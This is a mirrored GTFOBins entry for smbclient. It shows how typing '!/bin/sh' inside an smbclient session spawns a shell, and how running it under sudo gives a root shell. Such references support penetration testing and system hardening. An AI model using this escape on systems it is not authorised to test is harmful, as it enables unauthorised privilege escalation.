1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-16 12:31:34 +01:00
GTFOBins.github.io/_gtfobins/smbclient.md
2018-10-05 18:55:38 +01:00

13 lines
217 B
Markdown

---
description: A valid SMB/CIFS server must be available.
functions:
shell:
- code: |
smbclient \\ip\share
!/bin/sh
sudo:
- code: |
sudo smbclient \\ip\share
!/bin/sh
---